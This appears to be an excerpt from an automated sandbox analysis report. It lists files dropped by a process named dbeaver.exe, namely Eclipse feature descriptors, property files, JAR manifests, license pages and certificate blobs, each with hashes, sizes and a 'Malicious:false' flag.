      SHA1:5CAE9EB4776FA99BCAD656B18A90553BA0A27C24
      SHA-256:4547FDA1E17E5471F764DF8640DCC7858CBBEAE869ED691D3802C7E47293135A
      SHA-512:E1B0BC067FD959DD911D3E0F8F70FCD23F1C212C42DC3B201A559DEEC10F679A5C47E532190A31AABE6610EBF06845204599B5086F179953A6A68B51894D8029
      Malicious:false
      Reputation:unknown
      Preview:0.%N..*.H........%?0.%;...1.0...`.H.e......0...*.H..........0...0..x..........W..!2.9...wu\0...*.H........0b1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1!0...U....DigiCert Trusted Root G40...130801120000Z..380115120000Z0b1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1!0...U....DigiCert Trusted Root G40.."0...*.H.............0..........sh..]J<0"0i3..%..!=..Y..).=X.v..{....0....8..V.m...y....._..<R.R....~...W.YUr.h.p..u.js2...D.......t;mq.-... .. .c)-..^N..!a.4...^.[......4@_.zf.w.H.fWW.TX..+.O.0.V..{]..O^.5.1..^......@.y.x...j.8.....7...}...>..p.U.A2...s*n..|!L....u]xf.:1D.3@...ZI...g.'..O9..X..$\F.d..i.v.v=Y]Bv...izH....f.t..K...c....:.=...E%...D.+~....am.3...K...}....!........p,A`..c.D..vb~.....d.3....C....w.....!..T)%.l..RQGt.&..Au.z._.?..A..[..P.1..r."..|Lu?c.!_. Qko....O..E_. ........~.&...i/..-............B0@0...U.......0....0...U...........0...U..........q]dL..g?....O0...*.H..............a.}.l.........dh.V.w.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):568
      Entropy (8bit):5.8223852463036385
      Encrypted:false
      SSDEEP:
      MD5:FB04ACB05800D8BADDD82F8C826031CD
      SHA1:4B93043037490D84DC58799FC66E1F078495FD4B
      SHA-256:27D851FE1AAC04E5A1459267FB32D3580ECB1F845BEABBE067F699C9828F5435
      SHA-512:14C2733D3E0AECE2EDA1D6FB2E620EBA4BB09386042A65540AE18B1A009B7EECBCF0706E60E0A2CD687A5C6801D3A7CBC111ECFAB32AD473880448D51DA3E2A8
      Malicious:false
      Reputation:unknown
      Preview:Signature-Version: 1.0..Created-By: 11.0.18 (Eclipse Adoptium)..SHA-256-Digest-Manifest: eB6DzTyncHEHBK7ToBHSN7ocKYi0FZ7verY5DMra0bo=..SHA-256-Digest-Manifest-Main-Attributes: rno6v0Aj7cN+fCL6AZjQqJ/DhhApnvh.. 3JhJf/KjlzXc=....Name: epl-2.0.html..SHA-256-Digest: AED4dAeGrOY0hc5nW8gJmyCMPlZ5rTF8ACL9TK1dx/Q=....Name: feature.xml..SHA-256-Digest: hjJjUSOwl1vLTAi/3cXFdmyak4x8C7i5hDnWFDr3v3o=....Name: feature.properties..SHA-256-Digest: wZS8tkvvnXYlY+MUVVaHSF1iVgvCGQSvmS6oOm6vgMw=....Name: license.html..SHA-256-Digest: zVM/vJgU0kRLZDQ3qmgeRgMh5WQ38NzJh/8vJedLd0s=....
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):420
      Entropy (8bit):5.788862940376
      Encrypted:false
      SSDEEP:
      MD5:A6B663D32AA130BF81074C418B23E652
      SHA1:C13BB96B4B4FDDA5C5E6186FC9F9B6D3DD087164
      SHA-256:781E83CD3CA770710704AED3A011D237BA1C2988B4159EEF7AB6390CCADAD1BA
      SHA-512:03FFB8C6B091FA971D6CE4748C71ED4D80409161451DD9C0EA2F0816B7A0C551BC766A2D073219EA635E0F37A382F0FF076718D64D5951F32CB77A7A2F6F24B1
      Malicious:false
      Reputation:unknown
      Preview:Manifest-Version: 1.0..Created-By: Maven Archiver 3.6.1..Build-Jdk-Spec: 17....Name: epl-2.0.html..SHA-256-Digest: koxKavfpz4JYnlYPmP+7at5zhbWf7Iy07zamu5HPcBg=....Name: feature.xml..SHA-256-Digest: o2aEMEjpXlozO/GcP/ZmtHT6XGceUeCYNDd7Xba2+Hs=....Name: feature.properties..SHA-256-Digest: hRLmIYrBhYojpEgDRWzrSQ3qKTfv9kk2RstJK1IuTNQ=....Name: license.html..SHA-256-Digest: Dv5NbrV590iFepPFp4HDAA9w8zkHSynRW5FCE+FLHVM=....
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text
      Category:dropped
      Size (bytes):10159
      Entropy (8bit):5.034268550273161
      Encrypted:false
      SSDEEP:
      MD5:653ADCC728F3EF4697E06FD896F0DC80
      SHA1:E0E7D0A039F59191E71924266A72DAFBB6C2419C
      SHA-256:8512E6218AC1858A23A44803456CEB490DEA2937EFF6493646CB492B522E4CD4
      SHA-512:97D6C57FAA71BCD19661A5E529EC85ECD3E00011732E488BE4150421570408F8D8E7C2AA2A02D91C18E50B727F7110820192C35F51A83A22DACC0359013B6159
      Malicious:false
      Reputation:unknown
      Preview:###############################################################################.# Copyright (c) 2010, 2018 IBM Corporation and others..#.# This program and the accompanying materials.# are made available under the terms of the Eclipse Public License 2.0.# which accompanies this distribution, and is available at.# https://www.eclipse.org/legal/epl-2.0/.#.# SPDX-License-Identifier: EPL-2.0.# .# Contributors:.# IBM Corporation - initial API and implementation.###############################################################################.# feature.properties.# contains externalized strings for feature.xml.# "%foo" in feature.xml corresponds to the key "foo" in this file.# java.io.Properties file (ISO 8859-1 with "\" escapes).# This file should be translated...# "featureName" property - name of the feature.featureName=Eclipse 4 Rich Client Platform..# "providerName" property - name of the company that provides the feature.providerName=Eclipse.org..# "description" property - description
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:XML 1.0 document, ASCII text
      Category:dropped
      Size (bytes):9792
      Entropy (8bit):4.578440585127493
      Encrypted:false
      SSDEEP:
      MD5:ABC96C5047DAE3D11E1164CDFB6ECDE9
      SHA1:DBD547B3FD94FD416DB30252DE920DB6B2D77CEB
      SHA-256:A366843048E95E5A333BF19C3FF666B474FA5C671E51E09834377B5DB6B6F87B
      SHA-512:5B79D5CBFED3C237EB31B368783F4AA6E031CCD8CB3AE6E25193936A04CB8F2E002B1F2A23C61D99989E0836D45011F8510CBAFC1CD012FCBD1B9272069099A5
      Malicious:false
      Reputation:unknown
      Preview:<?xml version="1.0" encoding="UTF-8"?>.<feature. id="org.eclipse.e4.rcp". label="%featureName". version="4.30.0.v20231113-1355". provider-name="%providerName">.. <description>. %description. </description>.. <copyright>. %copyright. </copyright>.. <license url="%licenseURL">. %license. </license>.. <requires>. <import feature="org.eclipse.emf.common" version="2.7.0" match="compatible"/>. <import feature="org.eclipse.emf.ecore" version="2.7.0" match="compatible"/>. </requires>.. <plugin. id="org.eclipse.e4.core.services". version="2.4.200.v20231103-2012"/>.. <plugin. id="org.eclipse.e4.ui.workbench.swt". version="0.17.200.v20231030-2045"/>.. <plugin. id="org.eclipse.e4.core.commands". version="1.1.200.v20231108-1058"/>.. <plugin. id="org.eclipse.e4.ui.bindings". version="0.14.200.v20231030-2045"/>.. <plugin. id="org.eclipse.e4.ui.model.workbench"
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:data
      Category:dropped
      Size (bytes):9553
      Entropy (8bit):7.575147494351464
      Encrypted:false
      SSDEEP:
      MD5:43875C9E15F1706052079DC2B3F022BD
      SHA1:185B78E2FCCE4AAA0DBF4760E13DD6F9566D15A6
      SHA-256:9D549658C31CA3D2DAB1137E4907B385D51CBA8AF6F04CDE95E02F3F5D925F1A
      SHA-512:9C5F593472E722CF77BAEE48BC95E48ACBBBE5C49145B59A9326968D7AE8A98285E6B2347817F72A590FBC5EACF58CA93DB2170AA8632BF23764C865541D7548
      Malicious:false
      Reputation:unknown
      Preview:0.%M..*.H........%>0.%:...1.0...`.H.e......0...*.H..........0...0..x..........W..!2.9...wu\0...*.H........0b1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1!0...U....DigiCert Trusted Root G40...130801120000Z..380115120000Z0b1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1!0...U....DigiCert Trusted Root G40.."0...*.H.............0..........sh..]J<0"0i3..%..!=..Y..).=X.v..{....0....8..V.m...y....._..<R.R....~...W.YUr.h.p..u.js2...D.......t;mq.-... .. .c)-..^N..!a.4...^.[......4@_.zf.w.H.fWW.TX..+.O.0.V..{]..O^.5.1..^......@.y.x...j.8.....7...}...>..p.U.A2...s*n..|!L....u]xf.:1D.3@...ZI...g.'..O9..X..$\F.d..i.v.v=Y]Bv...izH....f.t..K...c....:.=...E%...D.+~....am.3...K...}....!........p,A`..c.D..vb~.....d.3....C....w.....!..T)%.l..RQGt.&..Au.z._.?..A..[..P.1..r."..|Lu?c.!_. Qko....O..E_. ........~.&...i/..-............B0@0...U.......0....0...U...........0...U..........q]dL..g?....O0...*.H..............a.}.l.........dh.V.w.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):650
      Entropy (8bit):5.876505305357117
      Encrypted:false
      SSDEEP:
      MD5:D317209D7FAD6C0DBE35EA873A04F387
      SHA1:00E3132CA103E65B8055233FB2327989D8CD71B2
      SHA-256:33C70F2BB7E42F754FCA43466A50C6BD093B0EE5912B3337048EB9B4D9C3F576
      SHA-512:5D1D04A7291C855FAC220F934A85B640A3713616E69613B3C4A9C32218056AA45DD2A714FAEBB41A611787831F0274A7B2F6F1111843ED6E3C959CCE712492A9
      Malicious:false
      Reputation:unknown
      Preview:Signature-Version: 1.0..Created-By: 11.0.21 (Eclipse Adoptium)..SHA-256-Digest-Manifest: W/JNIwyfZXTFPnFph86pO25OPOy9+JXaFRXeKqtLlxw=..SHA-256-Digest-Manifest-Main-Attributes: kp3q77+p3Nn7muZU2jSGPGhGjSEGlJx.. fLhiSkKI2PLI=....Name: about.html..SHA-256-Digest: a+GYMISy3hJhQ9WPUz1f9sfGhWw4kZs9s0La6eInU2c=....Name: epl-2.0.html..SHA-256-Digest: AED4dAeGrOY0hc5nW8gJmyCMPlZ5rTF8ACL9TK1dx/Q=....Name: feature.xml..SHA-256-Digest: CoS30gQ2WtnnLa0JBp69LZNFKJfSkDnuE6G6nWzI/7s=....Name: feature.properties..SHA-256-Digest: s6xqlKj7TCiGlkaqpw0NNt64KZrFK0Kw+Xg97Jb22dE=....Name: license.html..SHA-256-Digest: zVM/vJgU0kRLZDQ3qmgeRgMh5WQ38NzJh/8vJedLd0s=....
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):502
      Entropy (8bit):5.802034577242108
      Encrypted:false
      SSDEEP:
      MD5:9FA58EE5395BB0231BECBA2BF0054040
      SHA1:F92778F591523E54196FA1403707A214DC72213E
      SHA-256:5BF24D230C9F6574C53E716987CEA93B6E4E3CECBDF895DA1515DE2AAB4B971C
      SHA-512:062D367F76A4DF185CE2834B89C5A025C7BBA3DF4C5403937FA3144EC8202EF2012B8F22333952C50FC1C4CA2AD87B69EFB40E35E82FD2647E0EB5DEC04300E4
      Malicious:false
      Reputation:unknown
      Preview:Manifest-Version: 1.0..Created-By: Maven Archiver 3.5.2..Build-Jdk-Spec: 11....Name: about.html..SHA-256-Digest: NhSKFQjBnH9zINhfk8zvs36Cc3QL1t2HIkf44x3bWP4=....Name: epl-2.0.html..SHA-256-Digest: koxKavfpz4JYnlYPmP+7at5zhbWf7Iy07zamu5HPcBg=....Name: feature.xml..SHA-256-Digest: GIwm/K44LZX8AQ44+UH/qozmn4JZ9OSvkofiwphmuHY=....Name: feature.properties..SHA-256-Digest: p/J/osl+CqIONNCOq2ePrtJP2t8JnRwfx0rFW3sRHWA=....Name: license.html..SHA-256-Digest: Dv5NbrV590iFepPFp4HDAA9w8zkHSynRW5FCE+FLHVM=....
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:HTML document, ASCII text
      Category:dropped
      Size (bytes):1433
      Entropy (8bit):5.089157775573433
      Encrypted:false
      SSDEEP:
      MD5:1795A1BE5337CF15C2191397A60BD19A
      SHA1:7C315EC0D7AFB7405DAFA2DDCB0D116893E67155
      SHA-256:36148A1508C19C7F7320D85F93CCEFB37E8273740BD6DD872247F8E31DDB58FE
      SHA-512:4EF8D9A3726BA3B697A664D9F3A32673B56C75DB5468C7F893C0C3D7374BF55E1B3EA9EA06EC362E5F2249C3AAE5E32EBC539D9A76E36A9EE95716622FEC3D8B
      Malicious:false
      Reputation:unknown
      Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN". "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">.<html xmlns="http://www.w3.org/1999/xhtml">.<head>.<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"/>.<title>About</title>.</head>.<body lang="EN-US">.<h2>About This Content</h2>. .<p>June 25, 2008</p>..<h3>License</h3>..<p>The Eclipse Foundation makes available all content in this plug-in (&quot;Content&quot;). Unless otherwise .indicated below, the Content is provided to you under the terms and conditions of the.Eclipse Public License Version 1.0 (&quot;EPL&quot;). A copy of the EPL is available .at <a href="http://www.eclipse.org/legal/epl-v10.html">http://www.eclipse.org/legal/epl-v10.html</a>..For purposes of the EPL, &quot;Program&quot; will mean the Content.</p>..<p>If you did not receive this Content directly from the Eclipse Foundation, the Content is .being redistributed by another party (&quot;Redistributor&quot;) and different terms and
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text
      Category:dropped
      Size (bytes):9223
      Entropy (8bit):5.037965122773365
      Encrypted:false
      SSDEEP:
      MD5:72C2CD71B747EBCBA9EB958A62486B4D
      SHA1:631DD1077F3100818372652517255890D01EB23E
      SHA-256:A7F27FA2C97E0AA20E34D08EAB678FAED24FDADF099D1C1FC74AC55B7B111D60
      SHA-512:150FD306EB22EE2BC0CA021277EAEE6F8DDB73FBCFF16D0E33667685CAEFCB6DB11D9BA6DD9128C17D42E4A6914D0D35A7E3DF0A4074A2EAC469C9F92907F97B
      Malicious:false
      Reputation:unknown
      Preview:############################################################################.# Copyright (c) 2013 Composent Inc., IBM Corp. and others..#.# This program and the accompanying materials are made.# available under the terms of the Eclipse Public License 2.0.# which is available at https://www.eclipse.org/legal/epl-2.0/.#.# SPDX-License-Identifier: EPL-2.0.############################################################################.featureName=ECF Core API.providerName=Eclipse.org - ECF..copyright=Copyright (c) 2009 Composent, Inc. and others.\n\.\n\.This program and the accompanying materials are made\n\.available under the terms of the Eclipse Public License 2.0\n\.which is available at https://www.eclipse.org/legal/epl-2.0/\n\.\n\.SPDX-License-Identifier: EPL-2.0\n..# "licenseURL" property - URL of the "Feature License".# do not translate value - just change to point to a locale-specific HTML page.licenseURL=license.html..# "license" property - text of the "Feature Update License".# sho
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:XML 1.0 document, ASCII text
      Category:dropped
      Size (bytes):1271
      Entropy (8bit):4.814877321862545
      Encrypted:false
      SSDEEP:
      MD5:A4CD3062405F457B64625EA1F590DE28
      SHA1:37E8AF8DD87520B4D3DFCEFDF103107B3E8777C6
      SHA-256:188C26FCAE382D95FC010E38F941FFAA8CE69F8259F4E4AF9287E2C29866B876
      SHA-512:2FD4DEE6242124566B2AADB15F9F0A332953DFB847CF5C164606A2E62A57FE80C48C895F4D4380F70C2BBB16881EF96597C52AC990C11B8C21E198556F897610
      Malicious:false
      Reputation:unknown
      Preview:<?xml version="1.0" encoding="UTF-8"?>.<feature. id="org.eclipse.ecf.core.feature". label="ECF Core Feature". version="1.6.2.v20231021-2127". provider-name="Eclipse.org - ECF">.. <description url="http://www.eclipse.org/ecf">. This feature provides the ECF core (org.eclipse.ecf) and ECF identity (org.eclipse.ecf.identity) bundles. These two bundles are required for all other parts of ECF.. </description>.. <copyright>. %copyright. </copyright>.. <license url="%licenseURL">. %license. </license>.. <requires>. <import plugin="org.eclipse.equinox.common" version="3.6" match="compatible"/>. <import plugin="org.eclipse.equinox.registry" version="3.5" match="compatible"/>. <import plugin="org.eclipse.equinox.concurrent" version="1.0" match="compatible"/>. <import plugin="org.eclipse.core.jobs" version="3.5" match="compatible"/>. </requires>.. <plugin. id="org.eclipse.ecf". download-size="133". i
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:data
      Category:dropped
      Size (bytes):9554
      Entropy (8bit):7.573298812397703
      Encrypted:false
      SSDEEP:
      MD5:55DC51C40D2CF91F7B6B92D0D78385C0
      SHA1:501A7BBBBA770161157FB46E46852BA7A15C245B
      SHA-256:ADF132B2BE837CC7CD928A8F4B041B159C3C7E370819A9D0C581DAA71B49B92C
      SHA-512:3C2EE8F1E8F6E355488304485DA296C0F03093900F6F27A8E2AAF00FF4B0FD834F65938B80474AE0054C06CAB5DEA91317D1AC94436AF8A183974121BF25D178
      Malicious:false
      Reputation:unknown
      Preview:0.%N..*.H........%?0.%;...1.0...`.H.e......0...*.H..........0...0..x..........W..!2.9...wu\0...*.H........0b1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1!0...U....DigiCert Trusted Root G40...130801120000Z..380115120000Z0b1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1!0...U....DigiCert Trusted Root G40.."0...*.H.............0..........sh..]J<0"0i3..%..!=..Y..).=X.v..{....0....8..V.m...y....._..<R.R....~...W.YUr.h.p..u.js2...D.......t;mq.-... .. .c)-..^N..!a.4...^.[......4@_.zf.w.H.fWW.TX..+.O.0.V..{]..O^.5.1..^......@.y.x...j.8.....7...}...>..p.U.A2...s*n..|!L....u]xf.:1D.3@...ZI...g.'..O9..X..$\F.d..i.v.v=Y]Bv...izH....f.t..K...c....:.=...E%...D.+~....am.3...K...}....!........p,A`..c.D..vb~.....d.3....C....w.....!..T)%.l..RQGt.&..Au.z._.?..A..[..P.1..r."..|Lu?c.!_. Qko....O..E_. ........~.&...i/..-............B0@0...U.......0....0...U...........0...U..........q]dL..g?....O0...*.H..............a.}.l.........dh.V.w.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):650
      Entropy (8bit):5.8708939054484315
      Encrypted:false
      SSDEEP:
      MD5:478FA925AACF645304DBFAC2C27732AE
      SHA1:86B7796AA46169787A3307771CA0DE39280D9203
      SHA-256:E254B07FD80147C11538957594F3C57B25B1E49431AFD00E506B488898FC5E25
      SHA-512:313E2DA291424480819F12F01DAD1B7460B2EA7E71BA406728063973792ACF46DFFBF069B1014ED9B27B7B7F4E4CB913A2ED2E4D6CB0EBF4AF75AC0F3BE3107B
      Malicious:false
      Reputation:unknown
      Preview:Signature-Version: 1.0..Created-By: 11.0.18 (Eclipse Adoptium)..SHA-256-Digest-Manifest: 2u2CVRSXp2oRQYis+pbBVkrVIaH+omtJy3QZInc6hW0=..SHA-256-Digest-Manifest-Main-Attributes: kp3q77+p3Nn7muZU2jSGPGhGjSEGlJx.. fLhiSkKI2PLI=....Name: about.html..SHA-256-Digest: a+GYMISy3hJhQ9WPUz1f9sfGhWw4kZs9s0La6eInU2c=....Name: epl-2.0.html..SHA-256-Digest: AED4dAeGrOY0hc5nW8gJmyCMPlZ5rTF8ACL9TK1dx/Q=....Name: feature.xml..SHA-256-Digest: SVPYyrTxVf0QUY6IzeIiAHqWNexpXsFkCwikN+OPnx0=....Name: feature.properties..SHA-256-Digest: SOu6S5V17sp0KKyi3OnQY9xXoruxFNE23kF6GgWS1zM=....Name: license.html..SHA-256-Digest: zVM/vJgU0kRLZDQ3qmgeRgMh5WQ38NzJh/8vJedLd0s=....
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):502
      Entropy (8bit):5.82054265499982
      Encrypted:false
      SSDEEP:
      MD5:C9D6F888BC63364141F2531814673C9B
      SHA1:C050EDE360DCCFD34B7E7C0584AA8F211217D03A
      SHA-256:DAED82551497A76A114188ACFA96C1564AD521A1FEA26B49CB741922773A856D
      SHA-512:A86FC0922D6F81DF6140E5CEF44F5683251F28C6EA6F8BD7DAD36FBB35FB07ABFF33118E2DA68702FC6A446CE7C4F6641AE64264BA90755F52C296DD8573681A
      Malicious:false
      Reputation:unknown
      Preview:Manifest-Version: 1.0..Created-By: Maven Archiver 3.5.2..Build-Jdk-Spec: 11....Name: about.html..SHA-256-Digest: NhSKFQjBnH9zINhfk8zvs36Cc3QL1t2HIkf44x3bWP4=....Name: epl-2.0.html..SHA-256-Digest: koxKavfpz4JYnlYPmP+7at5zhbWf7Iy07zamu5HPcBg=....Name: feature.xml..SHA-256-Digest: J8uQsCNgyjQLf7ZXJ28S1zwGIYla44uIh0Bzh1TrINE=....Name: feature.properties..SHA-256-Digest: YuQ4TYFZK3qX8ZV4Nhhu+UmEc6skj4p7IzkWlN9/qHE=....Name: license.html..SHA-256-Digest: Dv5NbrV590iFepPFp4HDAA9w8zkHSynRW5FCE+FLHVM=....
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text
      Category:dropped
      Size (bytes):9227
      Entropy (8bit):5.038567561961659
      Encrypted:false
      SSDEEP:
      MD5:49AD0E29F24F43C452D6CFC1775C044C
      SHA1:1C82FBE260588DDABA4806DB3F420F51D39BEA40
      SHA-256:62E4384D81592B7A97F1957836186EF9498473AB248F8A7B23391694DF7FA871
      SHA-512:C32A5083CB07554B4EA561F028B0D026F846503940AEED0296E70B8AFB3DB3615CE492EF9CCBEEA1752475AE7B943C65502853FCB7126622446687B155424054
      Malicious:false
      Reputation:unknown
      Preview:############################################################################.# Copyright (c) 2014 Composent Inc., IBM Corp. and others..#.# This program and the accompanying materials are made.# available under the terms of the Eclipse Public License 2.0.# which is available at https://www.eclipse.org/legal/epl-2.0/.#.# SPDX-License-Identifier: EPL-2.0.############################################################################.featureName=ECF Core SSL API.providerName=Eclipse.org - ECF..copyright=Copyright (c) 2009 Composent, Inc. and others.\n\.\n\.This program and the accompanying materials are made\n\.available under the terms of the Eclipse Public License 2.0\n\.which is available at https://www.eclipse.org/legal/epl-2.0/\n\.\n\.SPDX-License-Identifier: EPL-2.0\n..# "licenseURL" property - URL of the "Feature License".# do not translate value - just change to point to a locale-specific HTML page.licenseURL=license.html..# "license" property - text of the "Feature Update License".#
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:XML 1.0 document, ASCII text
      Category:dropped
      Size (bytes):899
      Entropy (8bit):4.832302441625976
      Encrypted:false
      SSDEEP:
      MD5:07449453DDC4050AD9254C7FC6B251A5
      SHA1:6E14E2934EF3974184D8562D4FD814F0A983C191
      SHA-256:27CB90B02360CA340B7FB657276F12D73C0621895AE38B888740738754EB20D1
      SHA-512:252747BA4F31277E9F9AFF938BEC62EF79CE1F70ED0CE63289D24A748389FB0D7FDA6DF9D481631F6E96B759618ED39EA2591E61A27FB49DB7448FE6CD556B0F
      Malicious:false
      Reputation:unknown
      Preview:<?xml version="1.0" encoding="UTF-8"?>.<feature. id="org.eclipse.ecf.core.ssl.feature". label="ECF Core SSL Feature". version="1.1.501.v20230507-1921". provider-name="Eclipse.org - ECF">.. <description url="http://www.eclipse.org/ecf">. This feature provides the ECF core SSL fragment. On Equinox-based frameworks, this fragment exposes the Equinox TrustManager to ECF FileTransfer and other ECF-based communications.. </description>.. <copyright>. %copyright. </copyright>.. <license url="%licenseURL">. %license. </license>.. <requires>. <import plugin="org.eclipse.ecf"/>. <import plugin="org.eclipse.ecf.identity"/>. </requires>.. <plugin. id="org.eclipse.ecf.ssl". download-size="19". install-size="30". version="1.3.0.v20230507-1921". fragment="true". unpack="false"/>..</feature>.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:data
      Category:dropped
      Size (bytes):9554
      Entropy (8bit):7.5715850064050905
      Encrypted:false
      SSDEEP:
      MD5:52C1210DBF47238072696C4519803A59
      SHA1:5283331ADABC99E2795F4191587A58DC0D394915
      SHA-256:509BE3EB548120EF4598F241F0450CEB0D809E702414BA39D4797ABA66148B66
      SHA-512:DDB75442DEBA2893F0C6CA908B0D034343FD6CB55EBD56EAD9945C3AE5EFC686F0ABA91D5E618B075EE6FED3DC15F3C7FA66A5DE479007A82BFE79A2D105B40B
      Malicious:false
      Reputation:unknown
      Preview:0.%N..*.H........%?0.%;...1.0...`.H.e......0...*.H..........0...0..x..........W..!2.9...wu\0...*.H........0b1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1!0...U....DigiCert Trusted Root G40...130801120000Z..380115120000Z0b1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1!0...U....DigiCert Trusted Root G40.."0...*.H.............0..........sh..]J<0"0i3..%..!=..Y..).=X.v..{....0....8..V.m...y....._..<R.R....~...W.YUr.h.p..u.js2...D.......t;mq.-... .. .c)-..^N..!a.4...^.[......4@_.zf.w.H.fWW.TX..+.O.0.V..{]..O^.5.1..^......@.y.x...j.8.....7...}...>..p.U.A2...s*n..|!L....u]xf.:1D.3@...ZI...g.'..O9..X..$\F.d..i.v.v=Y]Bv...izH....f.t..K...c....:.=...E%...D.+~....am.3...K...}....!........p,A`..c.D..vb~.....d.3....C....w.....!..T)%.l..RQGt.&..Au.z._.?..A..[..P.1..r."..|Lu?c.!_. Qko....O..E_. ........~.&...i/..-............B0@0...U.......0....0...U...........0...U..........q]dL..g?....O0...*.H..............a.}.l.........dh.V.w.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):733
      Entropy (8bit):5.9098100711073425
      Encrypted:false
      SSDEEP:
      MD5:14ACA0ED29840FA5FC1C64A7F890CEB9
      SHA1:D31EEA5CF4C8318B0E046D4449F2D118704B76ED
      SHA-256:54A8DB65C58FFF26BB0EA7DBB7B18A7338F7D0ACB06DEF6B82AEA469E7B3CE75
      SHA-512:125EDECE197D0D083A380D555AAB93999756F9CCFE23DA9285943C550AA3EA336865ECBFB97561185E2F72F7F881C7E3A2A049C27B54BBD496D637027052C220
      Malicious:false
      Reputation:unknown
      Preview:Signature-Version: 1.0..Created-By: 11.0.21 (Eclipse Adoptium)..SHA-256-Digest-Manifest: YXyh91dnmX/3zBTDSG0yrxr7+HG/+4D/43WErpCxK4g=..SHA-256-Digest-Manifest-Main-Attributes: kp3q77+p3Nn7muZU2jSGPGhGjSEGlJx.. fLhiSkKI2PLI=....Name: about.html..SHA-256-Digest: oTf2+Q3AkNmcS7j8gpy0p/8i5w2XuXZa8RRV3aybQC0=....Name: epl-2.0.html..SHA-256-Digest: AED4dAeGrOY0hc5nW8gJmyCMPlZ5rTF8ACL9TK1dx/Q=....Name: asl-v20.txt..SHA-256-Digest: kjHdw0SOURRfzAxPk9UkENgbZbMRNTXIxkhPFmTNuIU=....Name: feature.xml..SHA-256-Digest: Ba1vMdDq4tt+6vZtYwcbKSu5IgGlWGjKyX6MhLk5igI=....Name: feature.properties..SHA-256-Digest: mlIGvLIjFvYV9hodBOl8Ia+nrmiYons6HNYwPGU4peA=....Name: license.html..SHA-256-Digest: zVM/vJgU0kRLZDQ3qmgeRgMh5WQ38NzJh/8vJedLd0s=....
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):585
      Entropy (8bit):5.827225768820456
      Encrypted:false
      SSDEEP:
      MD5:D51CC82F35ECEDD91F5C26924DC59C06
      SHA1:201EB0C68BFE27E3BE754E09B8A2DAD80B613CA3
      SHA-256:617CA1F75767997FF7CC14C3486D32AF1AFBF871BFFB80FFE37584AE90B12B88
      SHA-512:F13A6282A4BE32486023A7A37378B384533B686F7A22F50EE89C652283188CF4EF9BF8973A390C75EA0ACBC32AEED241C60567A4D5AD25208E7343B769BFCE3A
      Malicious:false
      Reputation:unknown
      Preview:Manifest-Version: 1.0..Created-By: Maven Archiver 3.5.2..Build-Jdk-Spec: 11....Name: about.html..SHA-256-Digest: POqrJ/GkaB7JNd67dYi/zeR71pOPSE4Qh2mcxPGTRmQ=....Name: epl-2.0.html..SHA-256-Digest: koxKavfpz4JYnlYPmP+7at5zhbWf7Iy07zamu5HPcBg=....Name: asl-v20.txt..SHA-256-Digest: z8d0m5b2O9McPEK1xHG/dWgUBT6EfBDz6wA0F7xSPTA=....Name: feature.xml..SHA-256-Digest: LlecLLTbB4hodhdsK5YnjETplGNWTAlUb3oJNj857tg=....Name: feature.properties..SHA-256-Digest: sXTo1umxzSuO+I1b+hvyntK9DVeToGdZVHhyZeNV3B0=....Name: license.html..SHA-256-Digest: Dv5NbrV590iFepPFp4HDAA9w8zkHSynRW5FCE+FLHVM=....
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:HTML document, ASCII text
      Category:dropped
      Size (bytes):15986
      Entropy (8bit):4.77194500013831
      Encrypted:false
      SSDEEP:
      MD5:45CC6C79C17095A5760E318B1F3125CA
      SHA1:E6E75574B37C43FEE33F6F464035910A4B56122D
      SHA-256:3CEAAB27F1A4681EC935DEBB7588BFCDE47BD6938F484E1087699CC4F1934664
      SHA-512:BE0469EAD470B562736BE64FA8F88C542189A820C8D21F5FF0641F13940EB766A79CCC01549C9B950358C0C17F473A68DDB827640BD450B4AEC1E537E209CA8C
      Malicious:false
      Reputation:unknown
